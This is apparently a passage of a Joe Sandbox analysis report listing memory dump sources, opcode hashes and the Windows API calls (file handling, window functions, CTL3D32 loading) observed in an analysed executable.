                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                        • Opcode ID: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                                                                        • Instruction ID: 68673b5cf84413dff1d7ecec16939cb2303f89f305828e6cd22260af4b89741b
                                                                                                                                        • Opcode Fuzzy Hash: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                                                                        • Instruction Fuzzy Hash: EDE07EB2610119AF9B40DE8CDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4
                                                                                                                                        APIs
                                                                                                                                        • FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseFind
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1863332320-0
                                                                                                                                        • Opcode ID: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                                                                        • Instruction ID: 5c2dbd3a099336849a47a332199978da45cb785deb8a29a76394180ab3bc5383
                                                                                                                                        • Opcode Fuzzy Hash: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                                                                        • Instruction Fuzzy Hash: A1E09BB09097004BC715DF39858031A76D19FC9325F05C96AEC99CF3D7E77D84454617
                                                                                                                                        APIs
                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                        • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                                                        • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                                                                        • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                                                        • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                                                                        APIs
                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                        • Opcode ID: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                                                                        • Instruction ID: adeaf4ebd0e6cd94d64be6b3cb299443ba394f13a0b1cd3d8337db6b6af80796
                                                                                                                                        • Opcode Fuzzy Hash: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                                                                        • Instruction Fuzzy Hash: 53D012722091506AD220965A6C44EAB6BDCCBC5770F11063AB558C2181D7209C01C675
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
                                                                                                                                        • ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                                                          • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoParametersSystem$ShowWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3202724764-0
                                                                                                                                        • Opcode ID: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                                                                        • Instruction ID: 3e39ddd90fb628193caaea160b6f4ed5bf244f394cc2da11a07db6b12dca8b82
                                                                                                                                        • Opcode Fuzzy Hash: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                                                                        • Instruction Fuzzy Hash: 34D05E123821703142307ABB280699B46EC8D822EB389043BB5449B312ED5DCE01116C
                                                                                                                                        APIs
                                                                                                                                        • SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: TextWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 530164218-0
                                                                                                                                        • Opcode ID: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                                                                        • Instruction ID: e359d8c046b4275bb87a72ac3440150ee0889cd0e7de0465f76ccf46c1161c2e
                                                                                                                                        • Opcode Fuzzy Hash: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                                                                        • Instruction Fuzzy Hash: 81D05EE27011602BCB01BAED54C4AC667CC9B8D25AB1840BBF904EF257D638CE40C398
                                                                                                                                        APIs
                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                        • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                                                        • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                                                                        • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                                                        • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                                                                        • Instruction ID: 53db4a1afaa3b7bebcc80daf879f764776582c58df104e6651e2d127eece83ed
                                                                                                                                        • Opcode Fuzzy Hash: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                                                                        • Instruction Fuzzy Hash: 48C08CE03222001A9E60A6BD2CC551F06CC891423A3A41E3BB129EB2E2D23D88162818
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                        • Opcode ID: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                                                                        • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                                                                        • Opcode Fuzzy Hash: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                                                                        • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                                                                        APIs
                                                                                                                                        • SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                                                          • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 734332943-0
                                                                                                                                        • Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                                                                        • Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
                                                                                                                                        • Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                                                                        • Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
                                                                                                                                        APIs
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1611563598-0
                                                                                                                                        • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                                                        • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                                                                                        • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                                                        • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                                                        • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                                                                                                        • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                                                        • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DestroyWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3375834691-0
                                                                                                                                        • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                                                        • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                                                                                        • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                                                        • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                                                        • Instruction ID: 41a6872630840156d23f43a697f0b10540748f54e9aa1b8241e7bbe25a2b1888
                                                                                                                                        • Opcode Fuzzy Hash: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                                                        • Instruction Fuzzy Hash: 73517574E002099FDB00EFA9C892AAFBBF5EB49314F50817AE500E7351DB389D41CB98
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                                                        • Instruction ID: 3312bc658de40493dbbbdb628fa1ac862c14c743cb2aabe02eeb7d71ec829e14
                                                                                                                                        • Opcode Fuzzy Hash: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                                                        • Instruction Fuzzy Hash: D5115A752007059BCB20DF19D880B82FBE5EF98390F10C53BE9688B385D3B4E8458BA9
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                        • Opcode ID: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                                                                        • Instruction ID: b902f5f71593d0acd8113edc39c0d5725662cc955bae9521e0e34912f41e4d76
                                                                                                                                        • Opcode Fuzzy Hash: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                                                                        • Instruction Fuzzy Hash: 850170356042486FC701DF699C008EEFBE8EB4D76171082B7FC24C3382D7345E059664
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                        • Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                                                                        • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                                                                        • Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                        APIs
                                                                                                                                        • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                                                                        • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                                                                        • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
